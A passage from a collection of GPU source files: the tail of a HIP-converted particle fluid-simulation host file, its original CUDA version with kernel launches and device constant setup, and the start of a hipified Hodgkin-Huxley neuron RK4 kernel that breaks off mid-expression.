dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CalcExplicitPressureGradient(hipStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcExplicitPressureGradient_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CalcTemperatureFactor(hipStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); hipLaunchKernelGGL(( CalcTemperatureFactor_Kernel), dim3(TS.Grids()),dim3(TS.Blocks()),0,Stream, ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(hipGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType InitializeDeviceMemConst(CParameter Parameter,Integer ParticleNum,CTriangle * Triangles,Integer TriangleNum,CTriangleParameters * TriangleParameters, Integer MaxParticleNum, CDistance * STLDistance,Integer * StlID, CCell * Cell,Integer CellNum, Integer * CellStart,Integer * CellEnd,Integer * GridParticleIndex, CGridBox BoundingBox) { CCTStatusType Status; Status = CudaSafeCall(hipMemcpyToSymbol(CONSTANT_PARAMETER, &Parameter, sizeof(CParameter))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_ParticleNum, &ParticleNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daTriangles, &Triangles, sizeof(Triangles))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_TriangleNum, &TriangleNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daTrianglesParameters, &TriangleParameters, sizeof(TriangleParameters))); CCT_ERROR_CHECK(Status); Status = 
CudaSafeCall(hipMemcpyToSymbol(c_MaxParticleNum, &MaxParticleNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daSTLDistance, &STLDistance, sizeof(STLDistance))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daSTLID, &StlID, sizeof(STLID))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daCell, &Cell, sizeof(Cell))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_CellNum, &CellNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_cellStart, &CellStart, sizeof(CellStart))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_cellEnd, &CellEnd, sizeof(CellEnd))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_gridParticleIndex, &GridParticleIndex, sizeof(GridParticleIndex))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall( hipMemcpyToSymbol(CONSTANT_BOUNDINGBOX, &BoundingBox, sizeof(CGridBox)) ); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } CCTStatusType InitializeDeviceConstOutPutParticles(Integer * OutputParticleID, Scalar3 * OutputParticlePosition, Scalar3 * OutputParticleVelocity, Scalar * OutputParticlePressure, Scalar * OutputParticleDensity, Scalar * OutputParticleTemperature, Scalar * OutputParticleKineticViscosity, Scalar * OutputParticleSolidPhaseRate, ParticleType * OutputParticleType) { CCTStatusType Status; Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleID,&OutputParticleID, sizeof(OutputParticleID))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticlePosition,&OutputParticlePosition, sizeof(OutputParticlePosition))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleVelocity,&OutputParticleVelocity, sizeof(OutputParticleVelocity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticlePressure,&OutputParticlePressure, sizeof(OutputParticlePressure))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleDensity,&OutputParticleDensity, sizeof(OutputParticleDensity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleTemperature,&OutputParticleTemperature, sizeof(OutputParticleTemperature))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleKineticViscosity,&OutputParticleKineticViscosity, sizeof(OutputParticleKineticViscosity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleSolidPhaseRate,&OutputParticleSolidPhaseRate, sizeof(OutputParticleSolidPhaseRate))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daOutputParticleType,&OutputParticleType, sizeof(OutputParticleType))); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } CCTStatusType InitializeDeviceConstInputParticles(Integer * InputParticleID, Scalar3 * InputParticlePosition, Scalar3 * InputParticleVelocity, Scalar * InputParticlePressure, Scalar * InputParticleDensity, Scalar * InputParticleTemperature, Scalar * InputParticleKineticViscosity, Scalar * InputParticleSolidPhaseRate, ParticleType * InputParticleType, Scalar* ParticleTurbulaceViscosity, Scalar* ParticleStrainTensorProduct) { CCTStatusType Status; Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleID,&InputParticleID, sizeof(InputParticleID))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticlePosition,&InputParticlePosition, 
sizeof(InputParticlePosition))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleVelocity,&InputParticleVelocity, sizeof(InputParticleVelocity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticlePressure,&InputParticlePressure, sizeof(InputParticlePressure))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleDensity,&InputParticleDensity, sizeof(InputParticleDensity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleTemperature,&InputParticleTemperature, sizeof(InputParticleTemperature))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleKineticViscosity,&InputParticleKineticViscosity, sizeof(InputParticleKineticViscosity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleSolidPhaseRate,&InputParticleSolidPhaseRate, sizeof(InputParticleSolidPhaseRate))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleType,&InputParticleType, sizeof(InputParticleType))); CCT_ERROR_CHECK(Status); //Turbulace Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleTurbulaceViscosity,&ParticleTurbulaceViscosity, sizeof(ParticleTurbulaceViscosity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daParticleStrainTensorProduct,&ParticleStrainTensorProduct, sizeof(ParticleStrainTensorProduct))); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } CCTStatusType ParticleNumberToConst(Integer ParticleNum) { CCTStatusType Status; Status = CudaSafeCall(hipMemcpyToSymbol(c_ParticleNum, &ParticleNum, sizeof(Integer))); //check_cuda_errors(__FILE__, __LINE__); CCT_ERROR_CHECK(Status); return CCT_NOERR; } CCTStatusType DragParametersToConst(DragParameter *InputDragParameter,Scalar3 *InputDragAcc,Scalar* InputDragTemperature ,Integer DragTriangleNum,Integer * MagnifierCount,CDragTriangle * DragTriangles) { CCTStatusType Status; Status = CudaSafeCall(hipMemcpyToSymbol(c_daSTLDragParameter,&InputDragParameter, sizeof(InputDragParameter))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daDragAcc,&InputDragAcc, sizeof(InputDragAcc))); CCT_ERROR_CHECK(Status); //For Drag Temperature Status = CudaSafeCall(hipMemcpyToSymbol(c_daDragTemperature,&InputDragTemperature, sizeof(InputDragTemperature))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_DragTriangleNum, &DragTriangleNum, sizeof(DragTriangleNum))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daMagnifierCount, &MagnifierCount, sizeof(MagnifierCount))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(hipMemcpyToSymbol(c_daDragTriangles, &DragTriangles, sizeof(DragTriangles))); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } }
f87d8ec53c60c1341ca2d987fa2943b31d98329e.cu
#include <stdio.h> #include "DataType.h" #include "DeviceProcess.h" #include "DeviceProcess_Kernel.h" #include <thrust/host_vector.h> #include <thrust/device_vector.h> #include <thrust/sort.h> #include <thrust/copy.h> #include <thrust/sequence.h> #include <thrust/random.h> #include <thrust/generate.h> #include <thrust/detail/type_traits.h> #include "IO.h" #include "Configuration.h" #define USECDUASTREAM //Round a / b to nearest higher integer value unsigned int iDivUp(unsigned int a, unsigned int b){ return (a % b != 0) ? (a / b + 1) : (a / b); } class CThreadScaler { private: Integer Dg; Integer Db; public: CThreadScaler(Integer NumThreads) { Db = min ( BLOCK_MAX_DIM, NumThreads); if(Db > 0) { Dg = iDivUp(NumThreads, Db); }else { Dg = 0; } } Integer Grids() { return Dg; } Integer Blocks() { return Db; } }; extern "C" { /*inline void check_cuda_errors(const char *filename, const int line_number) { #ifdef DEBUG cudaThreadSynchronize(); cudaError_t error = cudaGetLastError(); if(error != cudaSuccess) { printf("CUDA error at %s:%i: %s\n", filename, line_number, cudaGetErrorString(error)); exit(-1); } #endif }*/ CCTStatusType CalcTurbulenceViscosity(cudaStream_t &Stream,Integer ComputeParticleNum) { if(ComputeParticleNum > 0) { CCTStatusType StatusType; CThreadScaler TS(ComputeParticleNum); CalcTurbulenceViscosity_Kernel<<<TS.Grids(), TS.Blocks() ,0,Stream>>>(ComputeParticleNum); //std::string kernelName = "CalcTurbulenceViscosity"; //WriteConstant(kernelName,ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } //Check Particle outside compute zone starts CCTStatusType CheckParticleOutsideComputeZone(cudaStream_t &Stream,Integer *ParticleNum) { if((*ParticleNum) > 0) { CThreadScaler TS(*ParticleNum); CheckParticleOutsideComputeZone_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } //Check particle Outside Compute Zone Ends CCTStatusType CalcExplicitly(cudaStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CCTStatusType StatusType; CThreadScaler TS(ComputeParticleNum); CalcExplicitly_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType ResetTriangleTopology(cudaStream_t &Stream,Integer CellNum, CCell* aCell) { if(CellNum > 0) { CThreadScaler TS(CellNum); ResetTriangleTopology_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(CellNum, aCell); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType RegisterTriangleTopology(cudaStream_t &Stream,CTriangle* daTriangle, Integer TriangleNum, CCell* daCell, Integer CellNum) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); RegisterTriangleTopology_Kernel<<<DgTriangle, DbTriangle,0,Stream>>>(daTriangle, TriangleNum, daCell, CellNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType UpdateTrianglePosition(cudaStream_t &Stream,const Integer TriangleNum, CTriangle* daTriangles) { 
unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); UpdateTrianglePosition_Kernel<<<DgTriangle, DbTriangle,0,Stream>>>(TriangleNum, daTriangles); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType RotateTrianglePosition(cudaStream_t &Stream,const Integer TriangleNum,CTriangle* daTriangles, const Integer analysisStep) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); RotateTrianglePosition_Kernel<<<DgTriangle, DbTriangle,0,Stream>>>(TriangleNum, daTriangles, analysisStep); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType ResetWallPosition(cudaStream_t &Stream,const Integer TriangleNum,const Integer AnalysisStep,const CTriangle* daTriangles) { unsigned int DbTriangle = min ( BLOCK_MAX_DIM, TriangleNum); unsigned int DgTriangle = iDivUp(TriangleNum, DbTriangle); ResetWallPosition_Kernel<<<DgTriangle, DbTriangle,0,Stream>>>(TriangleNum,AnalysisStep, daTriangles); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType; StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); return CCT_NOERR; } CCTStatusType CalcSTLDistance(cudaStream_t &Stream, Integer ComputeParticleNum) { if(ComputeParticleNum > 0) { CThreadScaler TS(ComputeParticleNum); CalcSTLDistance_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CaculateCellIDandInitializeHash(cudaStream_t &Stream,Integer ParticleNum,Integer CellNum,int* dGridParticleHash, int* dGridParticleIndex, Scalar3* particlePosition) { if(ParticleNum > 0) { CThreadScaler TS(ParticleNum); // calculate grid hash calcHashD<<<TS.Grids(), TS.Blocks() ,0,Stream>>>(ParticleNum,dGridParticleHash,dGridParticleIndex,particlePosition); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType reorderDataAndFindCellStart(cudaStream_t& Stream,Integer numParticles,Integer numCells , int* gridParticleHash, int* gridParticleIndex, int* cellStart, int* cellEnd) { if(numParticles > 0) { CThreadScaler TS(numParticles); // set all cells to empty cudaMemsetAsync(cellStart, 0xffffffff, numCells*sizeof(int),Stream); cudaMemsetAsync(cellEnd, 0xffffffff, numCells*sizeof(int),Stream); int smemSize = sizeof(int)*(TS.Blocks()+1); reorderDataAndFindCellStartD<<< TS.Grids(), TS.Blocks(), smemSize,Stream>>>(numParticles,numCells,gridParticleHash, gridParticleIndex,cellStart, cellEnd); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType SortUsingThrust(Integer MaxParticleNum, Integer * daNumberHash, Integer* daNumberIndex) { CCTStatusType Status = CCT_NOERR; if(MaxParticleNum > 0) { thrust::sort_by_key(thrust::device_ptr<Integer>(daNumberHash), thrust::device_ptr<Integer>(daNumberHash + MaxParticleNum), thrust::device_ptr<Integer>(daNumberIndex)); //check_cuda_errors(__FILE__, __LINE__); Status = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(Status); } return Status; } 
CCTStatusType StableSortUsingThrust(Integer MaxParticleNum, Integer * daNumberHash, Integer* daNumberIndex) { CCTStatusType Status = CCT_NOERR; if(MaxParticleNum > 0) { thrust::stable_sort_by_key(thrust::device_ptr<Integer>(daNumberHash), thrust::device_ptr<Integer>(daNumberHash + MaxParticleNum), thrust::device_ptr<Integer>(daNumberIndex)); //check_cuda_errors(__FILE__, __LINE__); Status = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(Status); } return Status; } CCTStatusType CalcDragEffect(cudaStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); CalcDragEffect_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CalcExplicitPressure(cudaStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); CalcExplicitPressure_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CalcExplicitPressureGradient(cudaStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); CalcExplicitPressureGradient_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType CalcTemperatureFactor(cudaStream_t &Stream,Integer ComputeParticleNum) { if((ComputeParticleNum) > 0) { CThreadScaler TS(ComputeParticleNum); CalcTemperatureFactor_Kernel<<<TS.Grids(),TS.Blocks(),0,Stream>>>(ComputeParticleNum); //check_cuda_errors(__FILE__, __LINE__); CCTStatusType StatusType = CudaSafeCall(cudaGetLastError()); CCT_ERROR_CHECK(StatusType); } return CCT_NOERR; } CCTStatusType InitializeDeviceMemConst(CParameter Parameter,Integer ParticleNum,CTriangle * Triangles,Integer TriangleNum,CTriangleParameters * TriangleParameters, Integer MaxParticleNum, CDistance * STLDistance,Integer * StlID, CCell * Cell,Integer CellNum, Integer * CellStart,Integer * CellEnd,Integer * GridParticleIndex, CGridBox BoundingBox) { CCTStatusType Status; Status = CudaSafeCall(cudaMemcpyToSymbol(CONSTANT_PARAMETER, &Parameter, sizeof(CParameter))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_ParticleNum, &ParticleNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daTriangles, &Triangles, sizeof(Triangles))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_TriangleNum, &TriangleNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daTrianglesParameters, &TriangleParameters, sizeof(TriangleParameters))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_MaxParticleNum, &MaxParticleNum, sizeof(Integer))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daSTLDistance, &STLDistance, sizeof(STLDistance))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daSTLID, &StlID, sizeof(STLID))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daCell, &Cell, sizeof(Cell))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_CellNum, &CellNum, sizeof(Integer))); 
CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_cellStart, &CellStart, sizeof(CellStart))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_cellEnd, &CellEnd, sizeof(CellEnd))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_gridParticleIndex, &GridParticleIndex, sizeof(GridParticleIndex))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall( cudaMemcpyToSymbol(CONSTANT_BOUNDINGBOX, &BoundingBox, sizeof(CGridBox)) ); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } CCTStatusType InitializeDeviceConstOutPutParticles(Integer * OutputParticleID, Scalar3 * OutputParticlePosition, Scalar3 * OutputParticleVelocity, Scalar * OutputParticlePressure, Scalar * OutputParticleDensity, Scalar * OutputParticleTemperature, Scalar * OutputParticleKineticViscosity, Scalar * OutputParticleSolidPhaseRate, ParticleType * OutputParticleType) { CCTStatusType Status; Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleID,&OutputParticleID, sizeof(OutputParticleID))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticlePosition,&OutputParticlePosition, sizeof(OutputParticlePosition))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleVelocity,&OutputParticleVelocity, sizeof(OutputParticleVelocity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticlePressure,&OutputParticlePressure, sizeof(OutputParticlePressure))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleDensity,&OutputParticleDensity, sizeof(OutputParticleDensity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleTemperature,&OutputParticleTemperature, sizeof(OutputParticleTemperature))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleKineticViscosity,&OutputParticleKineticViscosity, sizeof(OutputParticleKineticViscosity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleSolidPhaseRate,&OutputParticleSolidPhaseRate, sizeof(OutputParticleSolidPhaseRate))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daOutputParticleType,&OutputParticleType, sizeof(OutputParticleType))); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } CCTStatusType InitializeDeviceConstInputParticles(Integer * InputParticleID, Scalar3 * InputParticlePosition, Scalar3 * InputParticleVelocity, Scalar * InputParticlePressure, Scalar * InputParticleDensity, Scalar * InputParticleTemperature, Scalar * InputParticleKineticViscosity, Scalar * InputParticleSolidPhaseRate, ParticleType * InputParticleType, Scalar* ParticleTurbulaceViscosity, Scalar* ParticleStrainTensorProduct) { CCTStatusType Status; Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleID,&InputParticleID, sizeof(InputParticleID))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticlePosition,&InputParticlePosition, sizeof(InputParticlePosition))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleVelocity,&InputParticleVelocity, sizeof(InputParticleVelocity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticlePressure,&InputParticlePressure, sizeof(InputParticlePressure))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleDensity,&InputParticleDensity, sizeof(InputParticleDensity))); CCT_ERROR_CHECK(Status); Status 
= CudaSafeCall(cudaMemcpyToSymbol(c_daParticleTemperature,&InputParticleTemperature, sizeof(InputParticleTemperature))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleKineticViscosity,&InputParticleKineticViscosity, sizeof(InputParticleKineticViscosity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleSolidPhaseRate,&InputParticleSolidPhaseRate, sizeof(InputParticleSolidPhaseRate))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleType,&InputParticleType, sizeof(InputParticleType))); CCT_ERROR_CHECK(Status); //Turbulace Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleTurbulaceViscosity,&ParticleTurbulaceViscosity, sizeof(ParticleTurbulaceViscosity))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daParticleStrainTensorProduct,&ParticleStrainTensorProduct, sizeof(ParticleStrainTensorProduct))); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } CCTStatusType ParticleNumberToConst(Integer ParticleNum) { CCTStatusType Status; Status = CudaSafeCall(cudaMemcpyToSymbol(c_ParticleNum, &ParticleNum, sizeof(Integer))); //check_cuda_errors(__FILE__, __LINE__); CCT_ERROR_CHECK(Status); return CCT_NOERR; } CCTStatusType DragParametersToConst(DragParameter *InputDragParameter,Scalar3 *InputDragAcc,Scalar* InputDragTemperature ,Integer DragTriangleNum,Integer * MagnifierCount,CDragTriangle * DragTriangles) { CCTStatusType Status; Status = CudaSafeCall(cudaMemcpyToSymbol(c_daSTLDragParameter,&InputDragParameter, sizeof(InputDragParameter))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daDragAcc,&InputDragAcc, sizeof(InputDragAcc))); CCT_ERROR_CHECK(Status); //For Drag Temperature Status = CudaSafeCall(cudaMemcpyToSymbol(c_daDragTemperature,&InputDragTemperature, sizeof(InputDragTemperature))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_DragTriangleNum, &DragTriangleNum, sizeof(DragTriangleNum))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daMagnifierCount, &MagnifierCount, sizeof(MagnifierCount))); CCT_ERROR_CHECK(Status); Status = CudaSafeCall(cudaMemcpyToSymbol(c_daDragTriangles, &DragTriangles, sizeof(DragTriangles))); CCT_ERROR_CHECK(Status); //check_cuda_errors(__FILE__, __LINE__); return CCT_NOERR; } }
b43225e91aa4b76e134719df9a49b8079dc59f34.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #define NVAR 2 #define NNEU %(nneu)d //NROW * NCOL // device compute submethods __device__ %(type)s compute_dV(%(type)s V, %(type)s n, %(type)s m, %(type)s h, %(type)s I, %(type)s C_m, %(type)s V_Na, %(type)s V_K, %(type)s V_l, %(type)s g_Na, %(type)s g_K, %(type)s g_l) { return (-1/C_m) * (g_K*n*n*n*n*(V-V_K) + g_Na*m*m*m*h*(V-V_Na) + g_l*(V-V_l)-I); } __device__ %(type)s compute_dn(%(type)s V, %(type)s n) { // LVS TODO: This seems hacky %(type)s alpha_n; if(V == -55.0) alpha_n = 0.1; else alpha_n = (-0.01*(55.0+V)) / (exp(-(55.0+V)/10.0)-1); %(type)s beta_n = 0.125 * exp(-(V+65)/80.0); return (alpha_n * (1-n) - beta_n * n); } __device__ %(type)s compute_dm(%(type)s V, %(type)s m) { %(type)s alpha_m; if(V == -40.0) alpha_m = 1.0; else alpha_m = (-0.1*(40+V)) / (exp(-(40+V)/10.0) - 1); %(type)s beta_m = 4 * exp(-(V+65)/18.0); return (alpha_m * (1-m) - beta_m * m); } __device__ %(type)s compute_dh(%(type)s V, %(type)s h) { %(type)s alpha_h = 0.07 * exp(-(V+65)/20.0); %(type)s beta_h = 1 / (exp(-(35+V)/10.0) + 1); return (alpha_h * (1-h) - beta_h * h); } // main kernel __global__ void hodgkin_huxley_rk4(%(type)s* g_V, %(type)s* g_n, %(type)s* g_m, %(type)s* g_h, int num_neurons, %(type)s* I_pre, %(type)s dt, %(type)s* C_m, %(type)s* V_Na, %(type)s* V_K, %(type)s* V_l, %(type)s* g_Na, %(type)s* g_K, %(type)s* g_l) { int bid = blockIdx.x; int cart_id = bid * NNEU + threadIdx.x; %(type)s I, V, n, m, h; if(cart_id < num_neurons) { I = I_pre[cart_id]; V = g_V[cart_id]; n = g_n[cart_id]; m = g_m[cart_id]; h = g_h[cart_id]; %(type)s k1_V, k2_V, k3_V, k4_V; %(type)s k1_n, k2_n, k3_n, k4_n; %(type)s k1_m, k2_m, k3_m, k4_m; %(type)s k1_h, k2_h, k3_h, k4_h; // RK4 using device derivative calculation functions k1_V = dt * compute_dV(V, n, m, h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k1_n = dt * compute_dn(V, n); k1_m = dt * compute_dm(V, m); k1_h = dt * compute_dh(V, h); k2_V = dt * 